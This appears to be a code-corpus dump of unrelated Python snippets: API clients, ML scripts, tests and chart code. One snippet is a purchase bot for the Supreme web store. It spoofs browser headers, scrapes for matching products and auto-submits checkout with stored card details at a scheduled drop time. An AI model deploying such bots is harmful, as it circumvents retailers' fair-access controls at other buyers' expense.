# type: (str, List[Host], str, Optional[Union[dict, list]], RequestOptions, int) -> dict # noqa: E501
if isinstance(data, dict):
data.update(request_options.data)
query_parameters = dict(request_options.query_parameters)
if verb == Verb.GET:
query_parameters.update(request_options.data)
relative_url = "{}?{}".format(
path, QueryParametersSerializer.serialize(query_parameters)
)
request = Request(
verb.upper(),
request_options.headers,
data,
self._config.connect_timeout,
timeout,
self._config.proxies,
)
return self.retry(hosts, request, relative_url)
def retry(self, hosts, request, relative_url):
# type: (List[Host], Request, str) -> dict
for host in self._retry_strategy.valid_hosts(hosts):
request.url = "https://{}/{}".format(host.url, relative_url)
response = self._requester.send(request)
decision = self._retry_strategy.decide(host, response)
if decision == RetryOutcome.SUCCESS:
return response.content if response.content is not None else {}
elif decision == RetryOutcome.FAIL:
content = response.error_message
if response.content and "message" in response.content:
content = response.content["message"]
raise RequestException(content, response.status_code)
raise AlgoliaUnreachableHostException("Unreachable hosts")
def close(self):
# type: () -> None
self._requester.close()
class Request(object):
def __init__(
self, verb, headers, data, connect_timeout, timeout, proxies={}
): # noqa: E501
# type: (str, dict, Optional[Union[dict, list]], int, int, dict) -> None # noqa: E501
self.verb = verb
self.data = data
self.data_as_string = "" if data is None else DataSerializer.serialize(data)
self.headers = headers
self.connect_timeout = connect_timeout
self.timeout = timeout
self.proxies = proxies
self.url = ""
def __str__(self):
return "Request({}, {}, {}, {}, {}, {}, {})".format(
self.verb,
self.url,
self.headers,
self.data_as_string,
self.connect_timeout,
self.timeout,
self.proxies,
)
def __repr__(self):
return self.__str__()
def __eq__(self, other):
# type: (object) -> bool
return self.__dict__ == other.__dict__
class Response(object):
def __init__(
self,
status_code=None,
content=None,
error_message="",
is_timed_out_error=False,
is_network_error=False,
):
# type: (int, Optional[Dict[str, Any]], str, bool, bool) -> None
self.status_code = status_code
self.content = content
self.error_message = error_message
self.is_timed_out_error = is_timed_out_error
self.is_network_error = is_network_error
class RetryStrategy(object):
def valid_hosts(self, hosts):
# type: (list) -> list
for host in hosts:
if not host.up and self._now() - host.last_use > Host.TTL:
host.up = True
return [host for host in hosts if host.up]
def _now(self):
# type: () -> float
return time.time()
def decide(self, host, response):
# type: (Host, Response) -> str
host.last_use = time.time()
if response.is_timed_out_error:
host.retry_count += 1
return RetryOutcome.RETRY
elif self._is_retryable(response):
host.up = False
return RetryOutcome.RETRY
elif response.status_code is not None and self._is_success(response):
return RetryOutcome.SUCCESS
return RetryOutcome.FAIL
def _is_success(self, response):
# type: (Response) -> bool
return response.status_code is not None and (response.status_code // 100) == 2
def _is_retryable(self, response):
# type: (Response) -> bool
if response.is_network_error:
return True
return (
response.status_code is not None
and (response.status_code // 100) != 2
and (response.status_code // 100) != 4
)
class RetryOutcome(object):
SUCCESS = "SUCCESS"
RETRY = "RETRY"
FAIL = "FAIL"
|
503203 | import sys
sys.setrecursionlimit(2000000000)
def factoring(n, lst, count):
if (count > n):
print "The factors are", lst
elif (n % count == 0):
lst.append(count)
print "list is", lst
factoring(n, lst, count+1)
else:
factoring(n, lst, count+1)
k = [1]
factoring(472822,k,2) |
503207 | import torch
import sys
_, a, b = sys.argv
x, y = torch.load(a), torch.load(b)
x, y = x.squeeze(), y.squeeze()
x = x / x.norm(dim = -1, keepdim = True)
y = y / y.norm(dim = -1, keepdim = True)
x = x[:1203]
y = y[:1203]
sim = (x*y).sum(dim=-1)
print(sim)
print(sim.mean()) |
503224 | import numpy as np
from astropy import units as u
from ..cube import SEDCube
def test_roundrip(tmpdir):
n_models = 30
n_ap = 3
n_wav = 10
s = SEDCube()
s.names = ['name_{0:02d}'.format(i) for i in range(n_models)]
s.apertures = np.linspace(10, 100, n_ap) * u.au
s.wav = np.linspace(0.01, 5000, n_wav)[::-1] * u.micron
s.distance = 1. * u.kpc
s.val = np.random.random((n_models, n_ap, n_wav)) * u.mJy
s.unc = np.random.random((n_models, n_ap, n_wav)) * u.mJy
temp_file = tmpdir.join('test_roundtrip_sedcube').strpath
s.write(temp_file)
s2 = SEDCube.read(temp_file)
assert s == s2
def test_roundrip_missing_optional(tmpdir):
n_models = 30
n_wav = 10
s = SEDCube()
s.names = ['name_{0:02d}'.format(i) for i in range(n_models)]
s.wav = np.linspace(0.01, 5000, n_wav)[::-1] * u.micron
s.distance = 1. * u.kpc
s.val = np.random.random((n_models, 1, n_wav)) * u.mJy
temp_file = tmpdir.join('test_roundtrip_sedcube').strpath
s.write(temp_file)
s2 = SEDCube.read(temp_file)
assert s == s2
|
503234 | from requests.exceptions import ConnectionError
class MediaWikiError(Exception):
"""
Raised when the MediaWiki API returns an error.
"""
def __init__(self, message, errors):
super(MediaWikiError, self).__init__(message)
self.errors = errors
class LoopException(Exception):
"""
Raised when a loop is detected.
"""
pass
class InvalidPageNameError(Exception):
"""
Raised when an invalid page name is
passed to trace().
"""
pass
class LinkNotFoundError(Exception):
"""
Raised when no valid link is found
after parsing.
"""
pass
|
503296 | import ast
from sklearn.preprocessing import LabelEncoder
from keras.preprocessing import sequence
import numpy as np
from keras.models import load_model
from optparse import OptionParser
from keras.layers import Average, Input
from keras.models import Model
def toEvaluationFormat(all_doc_ids, all_prediction):
evaluationFormatList = []
for i in range(len(all_doc_ids)):
current_doc_id = all_doc_ids[i]
current_prob = all_prediction[i][0]
#current_prob = all_prediction[i]
if current_prob > 0.5:
current_pred = 'true'
else:
current_prob = 1 - current_prob
current_pred = 'false'
evaluationFormat = str(current_doc_id) + ' ' + str(current_pred) + ' ' + str(current_prob) + '\n'
evaluationFormatList.append(evaluationFormat)
return evaluationFormatList
def load_data(data_path, max_len=200):
data = []
l = []
ids = []
i = 0
l_encoder = LabelEncoder()
with open(data_path, 'rb') as inf:
for line in inf:
gzip_fields = line.decode('utf-8').split('\t')
gzip_id = gzip_fields[0]
gzip_label = gzip_fields[1]
elmo_embd_str = gzip_fields[4].strip()
elmo_embd_list = ast.literal_eval(elmo_embd_str)
elmo_embd_array = np.array(elmo_embd_list)
padded_seq = sequence.pad_sequences([elmo_embd_array], maxlen=max_len, dtype='float32')[0]
data.append(padded_seq)
l.append(gzip_label)
ids.append(gzip_id)
i += 1
print(i)
label = l_encoder.fit_transform(l)
return np.array(data), np.array(label), np.array(ids)
def ensemble(models,model_input):
outputs = [model(model_input) for model in models]
y = Average()(outputs)
model = Model(model_input, y, name='ensemble')
return model
parser = OptionParser()
parser.add_option("--inputTSV", help="load saved cache", type=str)
parser.add_option("--output", help="load saved cache", type=str)
parser.add_option("--saved_model1", help="load saved cache", type=str)
parser.add_option("--saved_model2", help="load saved cache", type=str)
parser.add_option("--saved_model3", help="load saved cache", type=str)
options, arguments = parser.parse_args()
max_len = 200
embed_size = 1024
seed = 7
x_data, y_data, doc_id = load_data(options.inputTSV,max_len=max_len)
model1 = load_model(options.saved_model1)
model1.name = 'model1'
model2 = load_model(options.saved_model2)
model2.name = 'model2'
model3 = load_model(options.saved_model3)
model3.name = 'model3'
models = [model1, model2, model3]
print(models[0].input_shape[1:])
model_input = Input(shape=models[0].input_shape[1:], dtype='float32')
ensemble_models = ensemble(models,model_input)
pred = ensemble_models.predict(x_data)
all_pred = toEvaluationFormat(doc_id, pred)
with open(options.output, 'w') as fo:
for item in all_pred:
fo.write(item)
|
503303 | from .scope import scope
from .BaseScope import BaseScope
from .SoftDeletesMixin import SoftDeletesMixin
from .SoftDeleteScope import SoftDeleteScope
from .TimeStampsMixin import TimeStampsMixin
from .TimeStampsScope import TimeStampsScope
from .UUIDPrimaryKeyScope import UUIDPrimaryKeyScope
from .UUIDPrimaryKeyMixin import UUIDPrimaryKeyMixin
|
503326 | import datetime
import pytz
from django.utils import timezone
from connect.moderation.models import ModerationLogMsg
def log_moderator_event(msg_type, user, moderator, comment=''):
"""
Log a moderation event.
"""
message = ModerationLogMsg.objects.create(
msg_type=msg_type,
comment=comment,
pertains_to=user,
logged_by=moderator,
)
return message
def get_date_limits(start_date, end_date=None):
"""
Return first and last UTC moments of given date(s),
to the nearest microsecond.
`start_date` and `end_date` must be aware datetime objects.
If only one date is specified, the first and last moments of this date
will be returned.
"""
if not end_date:
end_date = start_date
start_date_tz = start_date.tzinfo
end_date_tz = end_date.tzinfo
start = datetime.datetime.combine(start_date, datetime.time.min)
start_local = timezone.make_aware(start, start_date_tz)
start_utc = start_local.astimezone(pytz.UTC)
end = datetime.datetime.combine(end_date, datetime.time.max)
end_local = timezone.make_aware(end, end_date_tz)
end_utc = end_local.astimezone(pytz.UTC)
return (start_utc, end_utc)
|
503332 | import torch
import os
from argparse import ArgumentParser
from logire import LogiRE, RelationExtractor
from dataset import BackboneDataset, get_backbone_collate_fn
from torch.utils.data import DataLoader
def main():
parser = ArgumentParser()
parser.add_argument('--mode', default='train')
parser.add_argument('--save_dir', default='logire-save')
parser.add_argument('--train_batch_size', type=int, default=4)
parser.add_argument('--test_batch_size', type=int, default=4)
parser.add_argument('--Ns', type=int, default=50, help="size of the latent rule set")
parser.add_argument('--num_epochs', type=int, default=50, help="number of training epochs for the relation extractor")
parser.add_argument('--warmup_ratio', type=float, default=0.06)
parser.add_argument('--rel_num', type=int, default=65, help="number of relation types")
parser.add_argument('--ent_num', type=int, default=10, help='number of entity types')
parser.add_argument('--n_iters', type=int, default=10, help='number of iterations')
parser.add_argument('--max_depth', type=int, default=3, help='max depth of the rules')
parser.add_argument('--data_dir', default='../kbp-benchmarks/DWIE/data/docred-style')
parser.add_argument('--backbone_path', default="data/dwie-atlop.dump")
parser.add_argument('--rule_path', default='data/dwie.grules.json')
args = parser.parse_args()
if args.mode == 'train':
logire = LogiRE(args)
logire.EM_optimization()
elif args.mode == 'test':
logire = LogiRE(args)
dev_ret, test_ret = logire.evaluate_base()
print('#' * 100 + '\n# Evaluating Backbone\n' + '#' * 100)
print('dev ', dev_ret)
print('test', test_ret)
collate_fn = get_backbone_collate_fn(0)
dev_data = BackboneDataset(logire.re_reader.read('dev'), logire.type_masks['dev'], logire.dists['dev'])
dev_loader = DataLoader(dev_data, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn)
test_data = BackboneDataset(logire.re_reader.read('test'), logire.type_masks['test'], logire.dists['test'])
test_loader = DataLoader(test_data, batch_size=args.test_batch_size, shuffle=False, collate_fn=collate_fn)
print('#' * 100 + '\n# Evaluating LogiRE\n' + '#' * 100)
for iter_i in range(args.n_iters + 1):
print('-'*45 + f'Iter {iter_i}' + '-'*50)
save_path = os.path.join(args.save_dir, f'scorer-{iter_i}.pt')
model = RelationExtractor(torch.load(save_path))
dev_ret = logire.evaluate_relation_extractor(model, dev_loader)
print('dev ', dev_ret)
test_ret = logire.evaluate_relation_extractor(model, test_loader, dev_ret['theta'])
print('test', test_ret)
else:
raise ValueError(f'Unknown mode {args.mode}')
if __name__ == "__main__":
main() |
503341 | import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from core.encoders import *
import json
from torch import optim
from cortex_DIM.nn_modules.mi_networks import MIFCNet, MI1x1ConvNet
from losses import *
class GlobalDiscriminator(nn.Module):
def __init__(self, args, input_dim):
super().__init__()
self.l0 = nn.Linear(32, 32)
self.l1 = nn.Linear(32, 32)
self.l2 = nn.Linear(512, 1)
def forward(self, y, M, data):
adj = Variable(data['adj'].float(), requires_grad=False).cuda()
# h0 = Variable(data['feats'].float()).cuda()
batch_num_nodes = data['num_nodes'].int().numpy()
M, _ = self.encoder(M, adj, batch_num_nodes)
# h = F.relu(self.c0(M))
# h = self.c1(h)
# h = h.view(y.shape[0], -1)
h = torch.cat((y, M), dim=1)
h = F.relu(self.l0(h))
h = F.relu(self.l1(h))
return self.l2(h)
class PriorDiscriminator(nn.Module):
def __init__(self, input_dim):
super().__init__()
self.l0 = nn.Linear(input_dim, input_dim)
self.l1 = nn.Linear(input_dim, input_dim)
self.l2 = nn.Linear(input_dim, 1)
def forward(self, x):
h = F.relu(self.l0(x))
h = F.relu(self.l1(h))
return torch.sigmoid(self.l2(h))
class FF(nn.Module):
def __init__(self, input_dim):
super().__init__()
# self.c0 = nn.Conv1d(input_dim, 512, kernel_size=1)
# self.c1 = nn.Conv1d(512, 512, kernel_size=1)
# self.c2 = nn.Conv1d(512, 1, kernel_size=1)
self.block = nn.Sequential(
nn.Linear(input_dim, input_dim),
nn.ReLU(),
nn.Linear(input_dim, input_dim),
nn.ReLU(),
nn.Linear(input_dim, input_dim),
nn.ReLU()
)
self.linear_shortcut = nn.Linear(input_dim, input_dim)
# self.c0 = nn.Conv1d(input_dim, 512, kernel_size=1, stride=1, padding=0)
# self.c1 = nn.Conv1d(512, 512, kernel_size=1, stride=1, padding=0)
# self.c2 = nn.Conv1d(512, 1, kernel_size=1, stride=1, padding=0)
def forward(self, x):
return self.block(x) + self.linear_shortcut(x)
|
503402 | import os
# To import anything we need to add the backend directory into sys.path
import sys
BACKEND_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
if BACKEND_DIR not in sys.path:
sys.path.append(BACKEND_DIR) |
503412 | import sys
from girder_worker.utils import TeeStdOutCustomWrite
def test_TeeStdOutCustomWrite(capfd):
nonlocal_ = {'data': ''}
def _append_to_data(message, **kwargs):
nonlocal_['data'] += message
with TeeStdOutCustomWrite(_append_to_data):
sys.stdout.write('Test String')
sys.stdout.flush()
assert nonlocal_['data'] == 'Test String'
out, err = capfd.readouterr()
assert out == 'Test String'
|
503434 | import os
from unittest import TestCase
import psutil
import glcontext
class ContextTestCase(TestCase):
def test_create(self):
"""Basic context testing"""
# Create a standalone context
# os.environ['GLCONTEXT_WIN_LIBGL'] = 'moo.dll'
# os.environ['GLCONTEXT_LINUX_LIBGL'] = 'ligGL.so.1'
# os.environ['GLCONTEXT_GLVERSION'] = '430'
backend = glcontext.default_backend()
ctx = backend(mode='standalone', glversion=330)
# Ensure methods are present
self.assertTrue(callable(ctx.load))
self.assertTrue(callable(ctx.release))
self.assertTrue(callable(ctx.__enter__))
self.assertTrue(callable(ctx.__exit__))
# Enter and exit context
with ctx:
pass
# Ensure method loading works
ptr = ctx.load('glEnable')
self.assertIsInstance(ptr, int)
self.assertGreater(ptr, 0)
# Load non-existent gl method
# NOTE: Disabled for now since x11 returns positive values
# for non-existent methods
# ptr = ctx.load('bogus')
# self.assertIsInstance(ptr, int)
# self.assertEqual(ptr, 0)
def test_mass_create(self):
"""Create and destroy a large quantity of contexts.
The rss memory usage should not grow more than 5x
after allocating 1000 contexts.
"""
process = psutil.Process(os.getpid())
start_rss = process.memory_info().rss
for i in range(1000):
ctx = glcontext.default_backend()(mode='standalone', glversion=330)
# Ensure we can enter context and load a method as a minimum
with ctx:
self.assertGreater(ctx.load('glBegin'), 0)
ctx.release()
end_rss = process.memory_info().rss
self.assertTrue(end_rss / start_rss < 5.0)
|
503444 | from apscheduler.schedulers.blocking import BlockingScheduler
from multiprocessing.dummy import Pool as ThreadPool
from bs4 import BeautifulSoup as bs
import requests
import timeit
import datetime
import time
import sys
import re
from getconf import *
# TO DO: scrape for early links
# Constants
base_url = 'http://www.supremenewyork.com'
# Inputs
keywords_category = ['shirts'] # Demo stuff, feel free to change
keywords_model = ['mini', 'shadow', 'plaid', 'shirt']
keywords_style = ['blue']
size = 'medium'
use_early_link = False
early_link = ''
# early_link = 'http://www.supremenewyork.com/shop/jackets/nzpacvjtk' #sold out
# early_link = 'http://www.supremenewyork.com/shop/shirts/r1k32vjf4/sblz8csj2' # mult sizes
# early_link = 'http://www.supremenewyork.com/shop/accessories/kcgevis8r/xiot9byq4' #one size
# Functions
def product_page(url):
print('Finding matching products...')
session = requests.Session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'X-XHR-Referer': 'http://www.supremenewyork.com/shop/all',
'Referer': 'http://www.supremenewyork.com/shop/all/bags',
'Accept': 'text/html, application/xhtml+xml, application/xml',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6',
'DNT': '1'
})
response = session.get(base_url + url)
soup = bs(response.text, 'html.parser')
h1 = soup.find('h1', {'itemprop': 'name'})
p = soup.find('p', {'itemprop': 'model'})
match = []
if h1 is not None and p is not None:
model = h1.string
style = p.string
for keyword in keywords_model:
if keyword.title() in model:
match.append(1)
else:
match.append(0)
# add to cart
if 0 not in match:
match = []
for keyword in keywords_style:
if keyword.title() in style:
match.append(1)
else:
match.append(0)
if 0 not in match:
print('FOUND: ' + model + ' at ' + base_url + url)
add_to_cart(soup, base_url+url)
else:
sys.exit('Sorry, couldnt find {} in {}'.format(model, style))
def add_to_cart(soup, url):
product_name = soup.find('h1',{'itemprop': 'name'}).string
print('Adding {} to cart...'.format(product_name))
session = requests.Session()
session.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'X-XHR-Referer': 'http://www.supremenewyork.com/shop/all',
'Referer': 'http://www.supremenewyork.com/shop/all/',
'Accept': 'text/html, application/xhtml+xml, application/xml',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6',
'DNT': '1'
})
form = soup.find('form', {'action': re.compile('(?<=/shop/)(.*)(?=/add)')})
csrf_token = soup.find('meta', {'name': 'csrf-token'})['content']
# find size
sold_out = soup.find('fieldset', {'id': 'add-remove-buttons'}).find('b')
if sold_out is not None:
sys.exit('Sorry, product is sold out!')
else:
if size.upper() == 'OS':
size_value = form.find('input', {'name': 'size'})['value']
else:
try:
size_value = soup.find('option', string=size.title())['value']
except:
sys.exit('Sorry, {} is sold out!'.format(size))
if form is not None:
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'size': size_value,
'commit': 'add to cart'
}
headers = {
'Accept': '*/*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript',
'Origin': 'http://www.supremenewyork.com',
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': url,
'X-XHR-Referer': None,
'X-CSRF-Token': csrf_token,
'Accept-Encoding': 'gzip, deflate'
}
session.post(base_url + form['action'], data=payload, headers=headers)
print('Added to cart!')
checkout(session)
else:
sys.exit('Sorry, product is sold out!')
def format_phone(n):
return '({}) {}-{}'.format(n[:3], n[3:6], n[6:])
def format_card(n):
return '{} {} {} {}'.format(n[:4], n[4:8], n[8:12], n[12:])
def checkout(session):
print('Filling out checkout info...')
response = session.get('https://www.supremenewyork.com/checkout')
soup = bs(response.text, 'html.parser')
form = soup.find('form', {'action': '/checkout'})
csrf_token = soup.find('meta', {'name': 'csrf-token'})['content']
headers = {
'Accept': 'text/html, */*; q=0.01',
'X-CSRF-Token': csrf_token,
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.supremenewyork.com/checkout',
'Accept-Encoding': 'gzip, deflate, sdch, br'
}
country_abbrv = shipping_country_abbrv
if country_abbrv == 'US':
country_abbrv = 'USA'
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'order[billing_name]': first_name + ' ' + last_name,
'order[email]': email,
'order[tel]': format_phone(phone_number),
'order[billing_address]': shipping_address_1,
'order[billing_address_2]': shipping_apt_suite,
'order[billing_zip]': shipping_zip,
'order[billing_city]': shipping_city,
'order[billing_state]': shipping_state,
'order[billing_country]': country_abbrv,
'same_as_billing_address': '1',
'store_credit_id': '',
'credit_card[type]': card_type,
'credit_card[cnb]': format_card(card_number),
'credit_card[month]': card_exp_month,
'credit_card[year]': card_exp_year,
'credit_card[vval]': card_cvv,
'order[terms]': '1',
'hpcvv': '',
'cnt': '2'
}
response = session.get('https://www.supremenewyork.com/checkout.js', data=payload, headers=headers)
payload = {
'utf8': '✓',
'authenticity_token': form.find('input', {'name': 'authenticity_token'})['value'],
'order[billing_name]': first_name + ' ' + last_name,
'order[email]': email,
'order[tel]': format_phone(phone_number),
'order[billing_address]': shipping_address_1,
'order[billing_address_2]': shipping_apt_suite,
'order[billing_zip]': shipping_zip,
'order[billing_city]': shipping_city,
'order[billing_state]': shipping_state_abbrv,
'order[billing_country]': country_abbrv,
'same_as_billing_address': '1',
'store_credit_id': '',
'credit_card[type]': card_type,
'credit_card[cnb]': format_card(card_number),
'credit_card[month]': card_exp_month,
'credit_card[year]': card_exp_year,
'credit_card[vval]': card_cvv,
'order[terms]': '1',
'hpcvv': ''
}
headers = {
'Origin': 'https://www.supremenewyork.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://www.supremenewyork.com/checkout',
'Accept-Encoding': 'gzip, deflate, br'
}
response = session.post('https://www.supremenewyork.com/checkout', data=payload, headers=headers)
if 'Your order has been submitted' in response.text:
print('Checkout was successful!')
sys.exit(0)
else:
soup = bs(response.text, 'html.parser')
print(soup.find('p').text)
sys.exit(0)
def on_time():
# Main
print(datetime.datetime.now())
start = timeit.default_timer()
session1 = requests.Session()
session1.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'Upgrade-Insecure-Requests': '1',
'DNT': '1',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6'
})
if use_early_link:
try:
response1 = session1.get(early_link)
soup = bs(response1.text, 'html.parser')
except:
sys.exit('Unable to connect to site...')
add_to_cart(soup, early_link)
else:
try:
url = base_url + '/shop/all/' + keywords_category[0] + '/'
response1 = session1.get(url)
except:
sys.exit('Unable to connect to site...')
soup1 = bs(response1.text, 'html.parser')
links1 = soup1.find_all('a', href=True)
links_by_keyword1 = []
for link in links1:
for keyword in keywords_category:
product_link = link['href']
if keyword in product_link and 'all' not in product_link:
if product_link not in links_by_keyword1:
links_by_keyword1.append(link['href'])
pool1 = ThreadPool(len(links_by_keyword1))
result1 = pool1.map(product_page, links_by_keyword1) # runtime
sched = BlockingScheduler(timezone='America/New_York')
sched.add_job(on_time, run_date='2016-09-01 10:59:59')
sched.start()
|
503469 | XX_train = np.concatenate((X_train, np.sin(4 * X_train)), axis=1)
XX_test = np.concatenate((X_test, np.sin(4 * X_test)), axis=1)
regressor.fit(XX_train, y_train)
y_pred_test_sine = regressor.predict(XX_test)
plt.plot(X_test, y_test, 'o', label="data")
plt.plot(X_test, y_pred_test_sine, 'o', label="prediction with sine")
plt.plot(X_test, y_pred_test, label='prediction without sine')
plt.legend(loc='best');
|
503520 | import seaborn as sns
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
FONT, fg, bg = sans, "white", "black"
atlas = pd.read_csv("datasets/countries.csv").split_columns(('nationality', 'tld', 'country'), "|").explode('country').set_index('country')
df = pd.read_csv("datasets/eu_foreignleaders.csv")
def entitle(img):
title = Image.from_text("foreign-born European leaders".upper(), FONT(108, bold=True), fg=fg, bg=bg)
subtitle = Image.from_text("the most recent foreign-born head of state and government from each country", FONT(60), fg=fg, bg=bg).pad((0,0,0,10), bg)
FOOTERS = ["""MORE RECENT (BUT LESS GOOD) ALTERNATIVES
1. President <NAME> (1957-65) was born in Nikolsburg which later became part of Czechoslovakia.
Chancellor <NAME> (1918-20/1945) was born in Dolní Dunajovice which later became part of Czechoslovakia.
2. President <NAME> (1994-00) was born in Viipuri which later became part of Russia.
Prussian-born Fre<NAME> was elected king in 1918 but never crowned.
3. President <NAME> (1980-85/90-95) was born in Proti, Ottoman Empire before it became part of Greece.
4. Council Chairman <NAME> (1961-65) was born in Fiume which later became part of Croatia.""",
"""
5. President <NAME> (1997-11) was born in Belfast, Northern Ireland, but at the time Ireland claimed sovereignty over the entire island.
6. Some sources list Prime Minsiter <NAME> (2009-13) as being born in Grabs, Switzerland, but others claim Vaduz.
7. Monaco-born Mindaugas II was elected King of Lithuania in 1918, but never assumed the crown.
8. President <NAME> (1996-00) was born Tighina which later became part of Moldova.
9. President <NAME> (1991-94) was born in Velykyi Zhytyn, Poland before it became part of Ukraine.
10. During the Nazi Occupation, Netherlands and Norway had a foreign-born Reichskommissar, but also a government in exile.""",
"""FOOTNOTES
11. Hitler's birthplace was part of Germany between 1938 and 1945.
12. Buzek's birthplace was part of Poland between 1938 and 1939.
BARELY FOREIGN (BUT I COULDN'T FIND ANYONE BETTER)
13. De Gasperi's birthplace became part of Italy during his lifetime.
14. Aura's birthplace was part of Finland before it became Russian.
15. Văcăroiu's birthplace was part of Romania before it became Ukrainian.
16. Atatürk's birthplace was part of Turkey before it became Greek.
""",]
footers = [Image.from_text(FOOTER, FONT(24), "white", padding=10, beard_line=True, line_spacing=1) for FOOTER in FOOTERS]
footer = Image.from_row(footers, padding=(20,5), yalign=0)
img = Image.from_column([title, subtitle, img, Rectangle((img.width, 2), "grey"), footer], bg=bg, padding=5).pad(15,bg=bg)
img = img.place(Image.from_text("/u/Udzu", FONT(16), fg=fg, bg=bg, padding=5).pad((1,1,0,0), fg), align=1, padding=10)
return img
grids = []
all_countries = sorted(set(df.country))
for countries in generate_batches(all_countries, ceil(len(all_countries)/3)):
def match(country, type):
match = df[(df.country == country) & (df.type == type)]
return dict(match.iloc[0]) if len(match) else np.nan
ss = [match(country, "s") for country in countries]
gs = [match(country, "g") for country in countries]
table = pd.DataFrame([ss,gs], index=["s","g"], columns=countries)
DEFAULT_IMG = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg" # "https://upload.wikimedia.org/wikipedia/commons/6/68/Solid_black.png" #
def cell(d):
if non(d) or not get_non(d, 'name'): return None
logger.info(f"{d['country']} / {d['type']}")
img = Image.from_url_with_cache(get_non(d, 'image', DEFAULT_IMG))
return Image.from_column([
Image.from_text(get_non(d, 'name', ''), FONT(16, bold=True),fg=fg, bg=bg, beard_line=True),
Image.from_text(get_non(d, 'role', ''), FONT(16, italics=True),fg=fg, bg=bg, beard_line=True),
img.cropped_resize((200,200), (0.5,get_non(d, 'align', 0.2)) if img.height >= img.width else (get_non(d, 'align', 0.5), 0.5)),
Image.from_text(f"{d['city']}, {d['place']}", FONT(16, bold=False), max_width=200, fg=fg, bg=bg, beard_line=True),
], bg=bg, padding=2).pad(5, bg)
def flag(column):
flag = Image.from_url_with_cache(atlas.flag[table.columns[column]]).to_rgba()
flag = flag.resize_fixed_aspect(height=140) if flag.width / flag.height < 1.3 else flag.resize((200,140))
flag = flag.trim(1).pad(1, "grey").pad((0,10,0,0), bg)
label = Image.from_text(table.columns[column].upper().replace("BOSNIA","BiH"), FONT(20, bold=True),fg=fg,bg=bg,beard_line=True)
return Image.from_column([flag.pad((0,0,0,10),bg=bg), label])
def row_label(row):
return Image.from_text("HEAD OF STATE" if row==0 else "HEAD OF GOV'T", FONT(20, bold=True), fg=fg, bg=bg, padding=(0,10)).pad_to(width=300).transpose(Image.ROTATE_90)
grid = grid_chart(table, cell, col_label=flag, row_label=row_label, bg=bg, yalign=0)
grids.append(grid)
chart = Image.from_column(grids, xalign=0)
chart = entitle(chart)
chart.convert("RGB").save("output/euforeignleaders.jpg")
|
503525 | from typing import List, Union
import pandas as pd
from exceldriver.columns import get_n_cols_after_col
def write_df_to_ws_values(df: pd.DataFrame, ws, begin_col: str = 'A', begin_row: int = 1):
# TODO: multi-index
num_cols = len(df.columns) + 1 # add 1 as index will automatically be converted to col
end_col = get_n_cols_after_col(begin_col, num_cols - 1) # -1 as first col goes in begin_col
end_row = begin_row + len(df)
cell_range = f'{begin_col}{begin_row}:{end_col}{end_row}'
values = _df_to_values_for_insert_into_ws(df)
ws.Range(cell_range).Value = values
def _df_to_values_for_insert_into_ws(df: pd.DataFrame) -> List[List[Union[str, float, int]]]:
temp_df = df.reset_index()
temp_df.fillna('', inplace=True)
temp_df['Date'] = temp_df['Date'].apply(lambda x: x.strftime('%m/%d/%Y') if not isinstance(x, str) else x)
values_list = temp_df.values.tolist()
values_list.insert(0, list(temp_df.columns))
return values_list
|
503574 | from datetime import datetime
import logging
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from edx_rest_api_client.client import EdxRestApiClient
from requests import RequestException
from slumber.exceptions import HttpClientError
from api.backends.base_api_client import BaseApiClient
log = logging.getLogger(__name__)
class OpenEdxApiClient(BaseApiClient, EdxRestApiClient):
"""API client to interact with OpenEdx Course API."""
TOKEN_URL = "/oauth2/access_token"
def __init__(self, content_source):
BaseApiClient.__init__(self, content_source=content_source)
log.debug("Creating new OpenEdx API client...")
token_cache_key = f'api:{self.content_source.o_auth_client.client_id}:token'
access_token = cache.get(token_cache_key)
if not access_token:
access_token, expires_at = self.get_oauth_access_token()
ttl = expires_at - datetime.now()
cache.set(token_cache_key, access_token, ttl.seconds)
EdxRestApiClient.__init__(self, self.url, jwt=access_token)
@property
def url(self):
return f'{self.content_source.host_url}/api/courses/v1/'
def get_oauth_access_token(self):
"""
Request OpenEdx API OAuth2 token.
Token type: JWT (reference: https://jwt.io/).
:return: access_token, expires_at
"""
url = "{host_url}{token_url}".format(
host_url=self.content_source.host_url,
token_url=self.TOKEN_URL
)
log.debug("Requesting oauth token: (url={})".format(url))
try:
oauth_client = self.content_source.o_auth_client
access_token, expires_at = super().get_oauth_access_token(
url=url,
client_id=oauth_client.client_id,
client_secret=oauth_client.client_secret,
token_type='jwt',
)
except ObjectDoesNotExist:
raise HttpClientError(
"OAuth token request failure. Please, configure OAuth client in order to be able make API requests."
)
except ValueError:
log.exception(
"You may want to check your OAuth registration on LTI Provider."
